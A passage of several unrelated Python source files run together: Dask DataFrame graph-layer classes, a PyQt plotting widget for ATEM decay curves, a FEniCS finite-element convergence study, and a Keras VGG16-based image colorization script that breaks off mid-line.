arguments, and outputs a DataFrame partition. label : str (optional) String to use as a prefix in the place-holder collection name. If nothing is specified (default), "subset-" will be used. produces_tasks : bool (optional) Whether one or more elements of `inputs` is expected to contain a nested task. This argument in only used for serialization purposes, and will be deprecated in the future. Default is False. creation_info: dict (optional) Dictionary containing the callable function ('func'), positional arguments ('args'), and key-word arguments ('kwargs') used to produce the dask collection with this underlying ``DataFrameIOLayer``. annotations: dict (optional) Layer annotations to pass through to Blockwise. """ def __init__( self, name, columns, inputs, io_func, label=None, produces_tasks=False, creation_info=None, annotations=None, ): self.name = name self.columns = columns self.inputs = inputs self.io_func = io_func self.label = label self.produces_tasks = produces_tasks self.annotations = annotations self.creation_info = creation_info # Define mapping between key index and "part" io_arg_map = BlockwiseDepDict( {(i,): inp for i, inp in enumerate(self.inputs)}, produces_tasks=self.produces_tasks, ) # Use Blockwise initializer dsk = {self.name: (io_func, blockwise_token(0))} super().__init__( output=self.name, output_indices="i", dsk=dsk, indices=[(io_arg_map, "i")], numblocks={}, annotations=annotations, ) def project_columns(self, columns): """Produce a column projection for this IO layer. Given a list of required output columns, this method returns the projected layer. """ if columns and (self.columns is None or columns < set(self.columns)): # Apply column projection in IO function try: io_func = self.io_func.project_columns(list(columns)) except AttributeError: io_func = self.io_func layer = DataFrameIOLayer( (self.label or "subset-") + tokenize(self.name, columns), list(columns), self.inputs, io_func, label=self.label, produces_tasks=self.produces_tasks, annotations=self.annotations, ) return layer else: # Default behavior return self def __repr__(self): return "DataFrameIOLayer<name='{}', n_parts={}, columns={}>".format( self.name, len(self.inputs), self.columns ) class DataFrameTreeReduction(Layer): """DataFrame Tree-Reduction Layer Parameters ---------- name : str Name to use for the constructed layer. name_input : str Name of the input layer that is being reduced. npartitions_input : str Number of partitions in the input layer. concat_func : callable Function used by each tree node to reduce a list of inputs into a single output value. This function must accept only a list as its first positional argument. tree_node_func : callable Function used on the output of ``concat_func`` in each tree node. This function must accept the output of ``concat_func`` as its first positional argument. finalize_func : callable, optional Function used in place of ``tree_node_func`` on the final tree node(s) to produce the final output for each split. By default, ``tree_node_func`` will be used. split_every : int, optional This argument specifies the maximum number of input nodes to be handled by any one task in the tree. Defaults to 32. split_out : int, optional This argument specifies the number of output nodes in the reduction tree. If ``split_out`` is set to an integer >=1, the input tasks must contain data that can be indexed by a ``getitem`` operation with a key in the range ``[0, split_out)``. output_partitions : list, optional List of required output partitions. This parameter is used internally by Dask for high-level culling. tree_node_name : str, optional Name to use for intermediate tree-node tasks. """ name: str name_input: str npartitions_input: str concat_func: callable tree_node_func: callable finalize_func: callable | None split_every: int split_out: int output_partitions: list[int] tree_node_name: str widths: list[int] height: int def __init__( self, name: str, name_input: str, npartitions_input: str, concat_func: callable, tree_node_func: callable, finalize_func: callable | None = None, split_every: int = 32, split_out: int | None = None, output_partitions: list[int] | None = None, tree_node_name: str | None = None, annotations: dict[str, Any] | None = None, ): super().__init__(annotations=annotations) self.name = name self.name_input = name_input self.npartitions_input = npartitions_input self.concat_func = concat_func self.tree_node_func = tree_node_func self.finalize_func = finalize_func self.split_every = split_every self.split_out = split_out self.output_partitions = ( list(range(self.split_out or 1)) if output_partitions is None else output_partitions ) self.tree_node_name = tree_node_name or "tree_node-" + self.name # Calculate tree widths and height # (Used to get output keys without materializing) parts = self.npartitions_input self.widths = [parts] while parts > 1: parts = math.ceil(parts / self.split_every) self.widths.append(parts) self.height = len(self.widths) def _make_key(self, *name_parts, split=0): # Helper function construct a key # with a "split" element when # bool(split_out) is True return name_parts + (split,) if self.split_out else name_parts def _define_task(self, input_keys, final_task=False): # Define nested concatenation and func task if final_task and self.finalize_func: outer_func = self.finalize_func else: outer_func = self.tree_node_func return (toolz.pipe, input_keys, self.concat_func, outer_func) def _construct_graph(self): """Construct graph for a tree reduction.""" dsk = {} if not self.output_partitions: return dsk # Deal with `bool(split_out) == True`. # These cases require that the input tasks # return a type that enables getitem operation # with indices: [0, split_out) # Therefore, we must add "getitem" tasks to # select the appropriate element for each split name_input_use = self.name_input if self.split_out: name_input_use += "-split" for s in self.output_partitions: for p in range(self.npartitions_input): dsk[self._make_key(name_input_use, p, split=s)] = ( operator.getitem, (self.name_input, p), s, ) if self.height >= 2: # Loop over output splits for s in self.output_partitions: # Loop over reduction levels for depth in range(1, self.height): # Loop over reduction groups for group in range(self.widths[depth]): # Calculate inputs for the current group p_max = self.widths[depth - 1] lstart = self.split_every * group lstop = min(lstart + self.split_every, p_max) if depth == 1: # Input nodes are from input layer input_keys = [ self._make_key(name_input_use, p, split=s) for p in range(lstart, lstop) ] else: # Input nodes are tree-reduction nodes input_keys = [ self._make_key( self.tree_node_name, p, depth - 1, split=s ) for p in range(lstart, lstop) ] # Define task if depth == self.height - 1: # Final Node (Use fused `self.tree_finalize` task) assert ( group == 0 ), f"group = {group}, not 0 for final tree reduction task" dsk[(self.name, s)] = self._define_task( input_keys, final_task=True ) else: # Intermediate Node dsk[ self._make_key( self.tree_node_name, group, depth, split=s ) ] = self._define_task(input_keys, final_task=False) else: # Deal with single-partition case for s in self.output_partitions: input_keys = [self._make_key(name_input_use, 0, split=s)] dsk[(self.name, s)] = self._define_task(input_keys, final_task=True) return dsk def __repr__(self): return "DataFrameTreeReduction<name='{}', input_name={}, split_out={}>".format( self.name, self.name_input, self.split_out ) def _output_keys(self): return {(self.name, s) for s in self.output_partitions} def get_output_keys(self): if hasattr(self, "_cached_output_keys"): return self._cached_output_keys else: output_keys = self._output_keys() self._cached_output_keys = output_keys return self._cached_output_keys def is_materialized(self): return hasattr(self, "_cached_dict") @property def _dict(self): """Materialize full dict representation""" if hasattr(self, "_cached_dict"): return self._cached_dict else: dsk = self._construct_graph() self._cached_dict = dsk return self._cached_dict def __getitem__(self, key): return self._dict[key] def __iter__(self): return iter(self._dict) def __len__(self): # Start with "base" tree-reduction size tree_size = (sum(self.widths[1:]) or 1) * (self.split_out or 1) if self.split_out: # Add on "split-*" tasks used for `getitem` ops return tree_size + self.npartitions_input * len(self.output_partitions) return tree_size def _keys_to_output_partitions(self, keys): """Simple utility to convert keys to output partition indices.""" splits = set() for key in keys: try: _name, _split = key except ValueError: continue if _name != self.name: continue splits.add(_split) return splits def _cull(self, output_partitions): return DataFrameTreeReduction( self.name, self.name_input, self.npartitions_input, self.concat_func, self.tree_node_func, finalize_func=self.finalize_func, split_every=self.split_every, split_out=self.split_out, output_partitions=output_partitions, tree_node_name=self.tree_node_name, annotations=self.annotations, ) def cull(self, keys, all_keys): """Cull a DataFrameTreeReduction HighLevelGraph layer""" deps = { (self.name, 0): { (self.name_input, i) for i in range(self.npartitions_input) } } output_partitions = self._keys_to_output_partitions(keys) if output_partitions != set(self.output_partitions): culled_layer = self._cull(output_partitions) return culled_layer, deps else: return self, deps def __dask_distributed_pack__(self, *args, **kwargs): from distributed.protocol.serialize import to_serialize # Pickle the (possibly) user-defined functions here _concat_func = to_serialize(self.concat_func) _tree_node_func = to_serialize(self.tree_node_func) if self.finalize_func: _finalize_func = to_serialize(self.finalize_func) else: _finalize_func = None return { "name": self.name, "name_input": self.name_input, "npartitions_input": self.npartitions_input, "concat_func": _concat_func, "tree_node_func": _tree_node_func, "finalize_func": _finalize_func, "split_every": self.split_every, "split_out": self.split_out, "output_partitions": self.output_partitions, "tree_node_name": self.tree_node_name, } @classmethod def __dask_distributed_unpack__(cls, state, dsk, dependencies): from distributed.protocol.serialize import to_serialize # Materialize the layer raw = cls(**state)._construct_graph() # Convert all keys to strings and dump tasks raw = {stringify(k): stringify_collection_keys(v) for k, v in raw.items()} keys = raw.keys() | dsk.keys() deps = {k: keys_in_tasks(keys, [v]) for k, v in raw.items()} # Must use `to_serialize` on the entire task. # This is required because the task-tuples contain `Serialized` # function objects instead of real functions. Using `dumps_task` # may or may not correctly wrap the entire tuple in `to_serialize`. # So we use `to_serialize` here to be explicit. When the task # arrives at a worker, both the `Serialized` task-tuples and the # `Serialized` functions nested within them should be deserialzed # automatically by the comm. return {"dsk": toolz.valmap(to_serialize, raw), "deps": deps}
import numpy as np from PyQt5 import QtCore, QtWidgets import pyqtgraph as pg from .ATEMWidget import ATEMWidget pg.setConfigOption('background', 'w') pg.setConfigOption('foreground', 'k') pg.setConfigOptions(antialias=True) class DecayWidget(ATEMWidget): """docstring for LocWidget""" def __init__(self, parent): super().__init__(parent) self.parent = parent self.lockYRange = False self.plotYmin = 1. self.plotYmax = 2. self.dataYmin = 1. self.dataYmax = 2. self.init_ui() self.show() def init_ui(self): """ Docstring """ # Make the background white palette = self.palette() palette.setColor(self.backgroundRole(), QtCore.Qt.white) self.setPalette(palette) self.titleLabel = QtWidgets.QLabel() self.titleLabel.setAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter) self.locLabel = QtWidgets.QLabel('') self.locLabel.setAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter) self.optLabel = QtWidgets.QLabel('') self.optLabel.setAlignment(QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter) self.plotWidget = pg.PlotWidget() self.plotWidget.setLogMode(x=True, y=True) self.plotWidget.setLabel('left', 'dB/dt') self.plotWidget.setLabel('bottom', 'Time', units='s') legend = self.plotWidget.addLegend(offset=(450, 30)) self.plotWidget.showGrid(x=True, y=True) self.obsPlot = pg.PlotDataItem(symbol='o', symbolSize=5, symbolBrush='k', pen={'color': 'k', 'width': 2}, name='Obs.') self.obsNegPlot = pg.PlotDataItem(symbol='o', symbolSize=5, symbolBrush='r', pen=None, name=None) self.predPlot = pg.PlotDataItem(symbol='o', symbolSize=5, symbolBrush='b', pen={'color': 'b', 'width': 2}, name='Pred.') self.selectedTimeLine = pg.InfiniteLine(angle=90, movable=False, pen={'color':'k', 'width':2, 'style':QtCore.Qt.DotLine}) self.lowerPlot = pg.PlotDataItem() self.upperPlot = pg.PlotDataItem() uncertBounds = pg.FillBetweenItem(self.lowerPlot, self.upperPlot, 0.8) # Crosshair self.chvLine = pg.InfiniteLine(angle=90, movable=False, pen={'color':'k', 'width':0.25}) self.chhLine = pg.InfiniteLine(angle=0, movable=False, pen={'color':'k', 'width':0.25}) self.plotWidget.addItem(self.chvLine, ignoreBounds=True) self.plotWidget.addItem(self.chhLine, ignoreBounds=True) self.plotWidget.addItem(self.obsPlot) self.plotWidget.addItem(self.obsNegPlot) self.plotWidget.addItem(self.predPlot) self.plotWidget.addItem(self.selectedTimeLine, ignoreBounds=True) self.plotWidget.addItem(uncertBounds, ignoreBounds=True) self.plotWidget.addItem(self.lowerPlot, ignoreBounds=True) self.plotWidget.addItem(self.upperPlot, ignoreBounds=True) uncertBounds.setZValue(0) self.selectedTimeLine.setZValue(1) self.obsNegPlot.setZValue(3) self.obsPlot.setZValue(2) self.predPlot.setZValue(4) self.chvLine.setZValue(5) self.chhLine.setZValue(6) legend.setZValue(6) l = QtWidgets.QVBoxLayout(self) l.addWidget(self.titleLabel) l.addWidget(self.plotWidget) labelBox = QtWidgets.QHBoxLayout() labelBox.addWidget(self.optLabel) labelBox.addWidget(self.locLabel) l.addLayout(labelBox) self.mouseMoveProxy = pg.SignalProxy(self.plotWidget.scene().sigMouseMoved, rateLimit=30, slot=self.mouseMovedEvent) self.plotWidget.scene().sigMouseClicked.connect(self.clickEvent) def keyPressEvent(self, event): """ Docstring """ key = event.key() if key == QtCore.Qt.Key_Right: signal = {'name':'nextLocInd'} elif key == QtCore.Qt.Key_Left: signal = {'name':'prevLocInd'} elif key == QtCore.Qt.Key_Up: signal = {'name':'nextTimeInd'} elif key == QtCore.Qt.Key_Down: signal = {'name':'prevTimeInd'} elif key == QtCore.Qt.Key_L: if self.lockYRange: self.lockYRange = False else: self.lockYRange = True self.updateOptLabel() self.updateYRange() return elif key == QtCore.Qt.Key_R: self.updateYRange(rescale=True) return else: return self.ChangeSelectionSignal.emit(signal) def mouseMovedEvent(self, pos): pos = pos[0] if self.plotWidget.sceneBoundingRect().contains(pos): mousePoint = self.plotWidget.getViewBox().mapSceneToView(pos) string = "<span style='font-size: 12pt'>t={:.2e}</span>" self.locLabel.setText(string.format(10**mousePoint.x())) self.chvLine.setPos(mousePoint.x()) self.chhLine.setPos(mousePoint.y()) def clickEvent(self, event): if self.plotWidget.sceneBoundingRect().contains(event.scenePos()): mousePoint = self.plotWidget.getViewBox().mapSceneToView(event.scenePos()) signal = {'name':'closestTime', 't':10**mousePoint.x()} self.ChangeSelectionSignal.emit(signal) else: pass def setLocation(self, loc): """ Docstring """ t = loc.t.values obs = loc.dBdt_Z.values nInd = obs < 0. self.obsPlot.setData(t, np.abs(obs)) self.obsNegPlot.setData(t[nInd], np.abs(obs[nInd])) if loc.dBdt_Z_pred.any(): pred = loc.dBdt_Z_pred.values self.predPlot.setData(t, pred) if loc.dBdt_Z_uncert.any(): lower = obs - loc.dBdt_Z_uncert.values upper = obs + loc.dBdt_Z_uncert.values lower[lower < 0.] = obs.min()/100. self.upperPlot.setData(t, lower) self.lowerPlot.setData(t, upper) self.plotWidget.setXRange(np.log10(t.min()), np.log10(t.max())) self.updateYRange(yMin=np.log10(np.abs(obs).min()), yMax=np.log10(np.abs(obs).max())) self.titleLabel.setText('{}'.format(loc.locInd.iloc[0])) def updateYRange(self, yMin=None, yMax=None, rescale=False): if yMin is not None: self.dataYmin = yMin if yMax is not None: self.dataYmax = yMax if not self.lockYRange: self.plotYmin = self.dataYmin self.plotYmax = self.dataYmax if rescale: if self.dataYmin < self.plotYmin: self.plotYmin = self.dataYmin if self.dataYmax > self.plotYmax: self.plotYmax = self.dataYmax self.plotWidget.setYRange(self.plotYmin, self.plotYmax) def setTime(self, time): """ docstring """ t = time.iloc[0].t self.selectedTimeLine.setPos(np.log10(t)) def updateOptLabel(self): if self.lockYRange: self.optLabel.setText("Lock Y-Range") else: self.optLabel.setText("")
from dolfin import * import numpy import sympy import sympy_interface as S import tabulate parameters["form_compiler"]["cpp_optimize"] = True set_log_level(ERROR) ### utils ################################################################# def my_mixed_function_space(Vs): """ My convenient handler for mixed function space. """ M = MixedFunctionSpace(Vs) def setter(u, ui): # impure setter for i in range(len(Vs)): assign(u.sub(i), interpolate(ui[i], Vs[i])) return u def getter(u): ui = u.split() vi = [] for i in range(len(Vs)): vi.append(interpolate(ui[i], Vs[i])) return vi return (M, setter, getter) def compute_error(u_h, u_ext, V): u_h_V = interpolate(u_h, V) u_ext_V = interpolate(u_ext, V) e = Function(V) e.vector()[:] = u_h_V.vector() - u_ext_V.vector() return e def calc_rate(hs, data): """ Compute the rate of converge by tabulating the successive slopes.""" hs = numpy.array(hs) data = numpy.array(data) tmp = numpy.diff(numpy.log(data))/numpy.diff(numpy.log(hs)) rate = numpy.zeros(data.size) rate[1:] = tmp return rate def print_conv_rate_table(hs, ds, names, h_alt = None): """ Convergence rate printer. """ # formatters h_fmt = lambda x: "{0:.4f}".format(x) data_fmt = ".4e" # tabulate converts numeric str to number # so this has to be set at the end rate_fmt = lambda x: "{0:.2f}".format(x) if x != 0 else "" # make table if h_alt is None: table = [map(h_fmt, hs)] else: table = [h_alt] header = [names[0]] for i in range(len(ds)): table.append(ds[i]) table.append(map(rate_fmt, calc_rate(hs, ds[i]))) header.append(names[i + 1]) header.append("rate") table = zip(*table) s = tabulate.tabulate(table, headers = header, floatfmt = data_fmt) return s def random_perturb_mesh(mesh, percentage, deep_copy = True, preserve_boundary = True): """ Randomly perturb a mesh. Input mesh - input mesh percentage - maximum amount of the perturbation as a percentage of hmin deep_copy - whether to copy the mesh before perturbing it preserve_boundary - whether to move the vertices on the boundary Output rmesh - the perturbed mesh """ # Preparation if percentage == 0.0: return mesh if deep_copy: rmesh = Mesh(mesh) else: rmesh = mesh h = rmesh.hmin() # Perturb xs = rmesh.coordinates() dx = numpy.random.rand(*(xs.shape)) * percentage * h # Preserve the boundary if preserve_boundary: boundary_mesh = BoundaryMesh(rmesh, "exterior") bv = boundary_mesh.entity_map(0).array() dx[bv] = 0.0 # Move rmesh.coordinates()[:] = xs + dx return rmesh ### 3d-2-form ############################################################# def make_spaces(pair_name, degree, mesh): if pair_name[1] == "+": W = FunctionSpace(mesh, "BDM", degree) Wb = FunctionSpace(mesh, "BDM", degree + 1) DWb = FunctionSpace(mesh, "DG", degree) r = 1 else: W = FunctionSpace(mesh, "RT", degree) Wb = FunctionSpace(mesh, "RT", degree + 1) DWb = FunctionSpace(mesh, "DG", degree + 1) r = 0 if pair_name[0] == "+": V = FunctionSpace(mesh, "N2curl", degree + r) Vb = FunctionSpace(mesh, "N2curl", degree + r + 1) DVb = FunctionSpace(mesh, "BDM", degree + r) else: V = FunctionSpace(mesh, "N1curl", degree + r) Vb = FunctionSpace(mesh, "N1curl", degree + r + 1) DVb = FunctionSpace(mesh, "RT", degree + r + 1) return (V, W, Vb, Wb, DVb, DWb) def make_data(switch): u = sympy.Matrix(sympy.sympify( """ ((cos(pi*x)+3)*sin(pi*y)*sin(pi*z), sin(pi*x)*(cos(pi*y)+2)*sin(pi*z), sin(pi*x)*sin(pi*y)*(cos(pi*z)+2)) """)) if switch[0] == "T": l1 = sympy.Matrix(sympy.sympify("(sin(pi*x), -sin(pi*y), 0)")) else: l1 = sympy.zeros(3, 1) if switch[1] == "T": l2 = sympy.Matrix(sympy.sympify( """ (( 1, 2, -1), ( 2, -2, 0), ( 1, 3, 1)) """)) else: l2 = sympy.zeros(3, 3) if switch[2] == "T": l3 = sympy.Matrix(sympy.sympify( """ (( 1, 0, -1), ( 0, -1, 0), ( 1, 2, 1)) """)) else: l3 = sympy.zeros(3, 3) if switch[3] == "T": l4 = sympy.Matrix(sympy.sympify("(1, 2, -1)")) else: l4 = sympy.zeros(3, 1) if switch[4] == "T": l5 = sympy.Matrix(sympy.sympify( """ (( 10, 0, 0), ( 0, 10, 0), ( 0, 0, 0)) """)) else: l5 = sympy.zeros(3, 3) # compute data in sympy du = S.div(u) sigma = S.curl(u) + l2 * u dsigma = S.curl(sigma) f = dsigma + l3 * sigma - S.grad(du) - S.grad(l1.dot(u)) + l4 * du + l5 * u # convert to FEniCS f = Expression(S.sympy2exp(f)) ext_sols = map(Expression, map(S.sympy2exp, (sigma, dsigma, u, du))) lots = map(Expression, map(S.sympy2exp, (l1, l2, l3, l4, l5))) return (f, lots, ext_sols) def solve_2_laplacian(pair_name, mesh, degree, f, lots, ext_sols): """ Solve the 1-form Laplacian with lower-order terms l1--l5 and right-hand side f using the pair of spaces given by pair_name. Then compute the error using the given exact solution. """ # solve (l1, l2, l3, l4, l5) = lots (V, W, Vb, Wb, DVb, DWb) = make_spaces(pair_name, degree, mesh) (M, setter, getter) = my_mixed_function_space([V, W]) (sigma, u) = TrialFunctions(M) (tau, v) = TestFunctions(M) lhs = (dot(sigma, tau) - dot(u, curl(tau)) - dot(dot(l2, u), tau) + dot(curl(sigma), v) + div(u) * div(v) + dot(l1, u) * div(v) + dot(dot(l3, sigma), v) + dot(l4, v) * div(u) + dot(dot(l5, u), v)) * dx rhs = dot(f, v) * dx A, b = assemble_system(lhs, rhs) solver = PETScLUSolver('mumps') solver.set_operator(A) m = Function(M) solver.solve(m.vector(), b) (sigma_h, u_h) = getter(m) # compute errors (sigma_ext, dsigma_ext, u_ext, du_ext) = ext_sols error = compute_error(sigma_h, sigma_ext, Vb) esigma = numpy.sqrt(assemble(inner(error, error) * dx)) error = compute_error(project(curl(sigma_h), DVb), dsigma_ext, DVb) edsigma = numpy.sqrt(assemble(inner(error, error) * dx)) error = compute_error(u_h, u_ext, Wb) eu = numpy.sqrt(assemble(inner(error, error) * dx)) error = compute_error(project(div(u_h), DWb), du_ext, DWb) edu = numpy.sqrt(assemble(inner(error, error) * dx)) return (esigma, edsigma, eu, edu) def exp(pair_name, degree, switch, meshes): (f, lots, ext_sols) = make_data(switch) hs = []; esigmas = []; edsigmas = []; eus = []; edus = [] for mesh in meshes: h = mesh.hmin() (esigma, edsigma, eu, edu) = solve_2_laplacian( pair_name, mesh, degree, f, lots, ext_sols) hs.append(h) esigmas.append(esigma) edsigmas.append(edsigma) eus.append(eu) edus.append(edu) return (hs, [esigmas, edsigmas, eus, edus]) def mesh_maker(m): mesh = UnitCubeMesh(m, m, m) mesh = random_perturb_mesh(mesh, 0.20, deep_copy = True, preserve_boundary = True) return mesh pairs = ["++", "+-", "-+", "--"] degrees = [2] switches = ["FFFFF", "TFFFF", "FTFFF", "FFTFF", "FFFTF", "FFFFT"] for degree in degrees: for pair_name in pairs: for switch in switches: ms = [2, 4, 8] meshes = map(mesh_maker, ms) (hs, es) = exp(pair_name, degree, switch, meshes) print("[pair: " + pair_name + " deg: " + str(degree) + " lots: " + switch + "]") print(print_conv_rate_table(hs, es, ["h", "sigma", "dsigma", "u", "du"], h_alt = ms)) print("")
from keras.models import Sequential, model_from_json from keras.layers.core import Dense, Dropout, Activation, Flatten, Reshape from keras.layers import Merge from keras.layers.convolutional import UpSampling2D, ZeroPadding2D, Convolution2D, MaxPooling2D,Conv2D from keras.utils import np_utils from keras.layers.normalization import BatchNormalization from keras.applications.vgg16 import VGG16 import numpy as np import matplotlib.pyplot as plt import matplotlib import os, shutil import theano from PIL import Image from numpy import * from sklearn.utils import shuffle from sklearn.cross_validation import train_test_split from skimage.color import rgb2lab import skimage.color as color # General parameters img_rows, img_cols = 96, 96 # Image dimensions after resizing bin_num = 20 # For classification : Since a and b channel contains continous value from -100 to 100, we bin them to several classes input_channels = 3 # The paper use 3 duplicated channel as input since pre-trained network has 3 channel, but we can use 1 if we are not using VGG-16 test_img_num = 60 # Use first-n files in the data folder to test the model lab_channels = ['l', 'a', 'b'] # Cnn model parameters era = 1000 epoch = 3 batch_size = 100 validation_split = 0.1 # Paths img_input_path = "./combined/" img_output_path = "./predict_output_concat_vgg/" img_reconstructed_path = "./reconstructed_input_after_bining/" img_channels_path = "./channels_img/" def save_img_of_channel(img_lab, channel, name="img"): img_lab_cp = img_lab.copy() # Delete the rest channels by setting them to 0 if channel == 'l': img_lab_cp[:,:,1:] = 0 elif channel == 'a': img_lab_cp[:,:,0] = 0 img_lab_cp[:,:,2] = 0 elif channel == 'b': img_lab_cp[:,:,:2] = 0 else: print "[ERROR!!] The channel should be 'l', 'a' or 'b' " return img_rgb_channel = color.lab2rgb(img_lab_cp) im = Image.fromarray((img_rgb_channel * 255).astype(uint8)) im.save(img_channels_path + name + "_" + channel + ".jpg", "jpeg") def save_image_by_channels(img_lab, name): # Seperate the image channels L a* and b* for i in xrange(0, len(lab_channels)): img = img_lab[:,:,i] save_img_of_channel(img_lab, lab_channels[i], name=name) def reconstruct_image_by_lab_channels(img_l, img_a, img_b): img = array([img_l.T, img_a.T, img_b.T]).T img_rgb_channel = color.lab2rgb(img) im = Image.fromarray((img_rgb_channel * 255).astype(uint8)) return im def get_img_ab_binned(img_lab): img_a = img_lab[:,:,1] img_b = img_lab[:,:,2] img_a_binned = ((img_a + 100) * bin_num) / 200 img_b_binned = ((img_b + 100) * bin_num) / 200 return img_a_binned.astype(int), img_b_binned.astype(int) def get_img_ab_unbinned(img_a_binned, img_b_binned): img_a_unbinned = ((img_a_binned * 200) / bin_num) - 100.0 img_b_unbinned = ((img_b_binned * 200) / bin_num) - 100.0 return img_a_unbinned, img_b_unbinned def save_input_image_after_bining(img_lab, name='img'): # Use this function to test how bin_num affect the original input image img_a_binned, img_b_binned = get_img_ab_binned(img_lab) img_a_unbinned, img_b_unbinned = get_img_ab_unbinned(img_a_binned, img_b_binned) im = reconstruct_image_by_lab_channels(img_lab[:,:,0], img_a_unbinned, img_b_unbinned) im.save(img_reconstructed_path + name + "_reconstructed_after_bining.jpg", "jpeg") def get_duplicated_l_channel(img_l, channels): img_l_duplicated = [] for i in xrange(channels): img_l_duplicated.append(img_l.T) result = array(img_l_duplicated).T return result ''' Start Here ''' imlist = os.listdir(img_input_path) imlist.sort() # ''' For playing with lab images and also testing the affect of bining ''' for i in xrange(test_img_num): # Save image of each channel (l, a, b) img_rgb = array(Image.open(img_input_path + imlist[i]).resize((img_rows,img_cols))) img_lab = rgb2lab(img_rgb) save_image_by_channels(img_lab, imlist[i]) # Test the color distortion of input image after bining save_input_image_after_bining(img_lab, name = imlist[i]) ''' For training and testing cnn model ''' X = [] # Traning inputs X_l = [] # Keep the l channel to reconstruct the image from lab to rgb Y = [] # Traning labels count = 1; for img in imlist: print "loading data .... " + str(count) + "/" +str(len(imlist)) img_rgb = array(Image.open(img_input_path + img).resize((img_rows,img_cols))) img_lab = rgb2lab(img_rgb) img_a_binned, img_b_binned = get_img_ab_binned(img_lab) img_y = np.append(img_a_binned.flatten(), img_b_binned.flatten()) y = np_utils.to_categorical(img_y, bin_num) X.append(get_duplicated_l_channel(img_lab[:,:,0], input_channels)) # The paper use 3 duplicated l channel as network input X_l.append(img_lab[:,:,0]) Y.append(y) count += 1 X = array(X).astype(np.float32) Y = array(Y) X_l = array(X_l) X = X - 45.0 print X.shape print Y.shape l_model = VGG16(weights='imagenet', include_top=False, input_shape=(img_rows, img_cols, 3)) l_model.summary() # Conv-Pooling Layers model1 = Sequential() model1.add(ZeroPadding2D((1,1), name='m1_c2', input_shape=(img_rows, img_cols, input_channels))) model1.add(Convolution2D(64, 3, 3, input_shape=(img_rows, img_cols, input_channels), name='m1_c3', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c4', )) model1.add(Convolution2D(64, 3, 3, border_mode='same', name='m1_c5', activation='relu')) model1.add(MaxPooling2D((2,2), name='m1_c6', strides=(2,2))) #model1.add(ZeroPadding2D((1,1), name='m1_c7')) model1.add(Convolution2D(128, 3, 3, border_mode='same', name='m1_c8', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c9')) model1.add(Convolution2D(128, 3, 3, border_mode='same', name='m1_c10', activation='relu')) model1.add(MaxPooling2D((2,2), name='m1_c11', strides=(2,2))) #model1.add(ZeroPadding2D((1,1), name='m1_c12')) model1.add(Convolution2D(256, 3, 3, border_mode='same', name='m1_c13', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c14')) model1.add(Convolution2D(256, 3, 3, border_mode='same', name='m1_c15', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c16')) model1.add(Convolution2D(256, 3, 3, border_mode='same', name='m1_c17', activation='relu')) model1.add(MaxPooling2D((2,2), name='m1_c18', strides=(2,2))) #model1.add(ZeroPadding2D((1,1), name='m1_c19')) model1.add(Convolution2D(512, 3, 3, border_mode='same', name='m1_c20', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c21')) model1.add(Convolution2D(512, 3, 3, border_mode='same', name='m1_c22', activation='relu')) #model1.add(ZeroPadding2D((1,1), name='m1_c23')) model1.add(Convolution2D(512, 3, 3, border_mode='same', name='m1_c24', activation='relu')) model1.add(MaxPooling2D((2,2), name='m1_c25', strides=(2,2))) for i in xrange(0, len(model1.layers), 1): model1.layers[i].set_weights(l_model.layers[i].get_weights()) model1.layers[i].trainable = False model1.add(Convolution2D(256, 1, 1, name='m1_c31', activation='relu')) model1.add(BatchNormalization(name='m1_c32')) model1.add(UpSampling2D((2,2), name='m1_c33')) model1.summary() model2 = Sequential() model2.add(ZeroPadding2D((1,1), name='m2_c2', input_shape=(img_rows, img_cols, input_channels))) model2.add(Convolution2D(64, 3, 3, input_shape=(img_rows, img_cols, input_channels), name='m2_c3', activation='relu')) #model2.add(ZeroPadding2D((1,1), name='m2_c4', )) model2.add(Convolution2D(64, 3, 3, border_mode='same', name='m2_c5', activation='relu')) model2.add(MaxPooling2D((2,2), name='m2_c6', strides=(2,2))) #model2.add(ZeroPadding2D((1,1), name='m2_c7')) model2.add(Convolution2D(128, 3, 3, border_mode='same', name='m2_c8', activation='relu')) #model2.add(ZeroPadding2D((1,1), name='m2_c9')) model2.add(Convolution2D(128, 3, 3, border_mode='same', name='m2_c10', activation='relu')) model2.add(MaxPooling2D((2,2), name='m2_c11', strides=(2,2))) #model2.add(ZeroPadding2D((1,1), name='m2_c12')) model2.add(Convolution2D(256, 3, 3, border_mode='same', name='m2_c13', activation='relu')) #model2.add(ZeroPadding2D((1,1), name='m2_c14')) model2.add(Convolution2D(256, 3, 3, border_mode='same', name='m2_c15', activation='relu')) #model2.add(ZeroPadding2D((1,1), name='m2_c16')) model2.add(Convolution2D(256, 3, 3, border_mode='same', name='m2_c17', activation='relu')) model2.add(MaxPooling2D((2,2), name='m2_c18', strides=(2,2))) for i in xrange(0, len(model2.layers), 1): model2.layers[i].set_weights(l_model.layers[i].get_weights()) model2.layers[i].trainable = False model2.add(BatchNormalization(name='m2_c32')) model2.summary() model3 = Sequential() model3.add(ZeroPadding2D((1,1), name='m3_c2', input_shape=(img_rows, img_cols, input_channels))) model3.add(Convolution2D(64, 3, 3, input_shape=(img_rows, img_cols, input_channels), name='m3_c3', activation='relu')) #model3.add(ZeroPadding2D((1,1), name='m3_c4', )) model3.add(Convolution2D(64, 3, 3, border_mode='same', name='m3_c5', activation='relu')) model3.add(MaxPooling2D((2,2), name='m3_c6', strides=(2,2))) #model3.add(ZeroPadding2D((1,1), name='m3_c7')) model3.add(Convolution2D(128, 3, 3, border_mode='same', name='m3_c8', activation='relu')) #model3.add(ZeroPadding2D((1,1), name='m3_c9')) model3.add(Convolution2D(128, 3, 3, border_mode='same', name='m3_c10', activation='relu')) model3.add(MaxPooling2D((2,2), name='m3_c11', strides=(2,2))) for i in xrange(0, len(model3.layers), 1): model3.layers[i].set_weights(l_model.layers[i].get_weights()) model3.layers[i].trainable = False model3.add(BatchNormalization(name='m3_c32')) model3.summary() model4 = Sequential() model4.add(ZeroPadding2D((1,1), name='m4_c2', input_shape=(img_rows, img_cols, input_channels))) model4.add(Convolution2D(64, 3, 3, input_shape=(img_rows, img_cols, input_channels), name='m4_c3', activation='relu')) #model4.add(ZeroPadding2D((1,1), 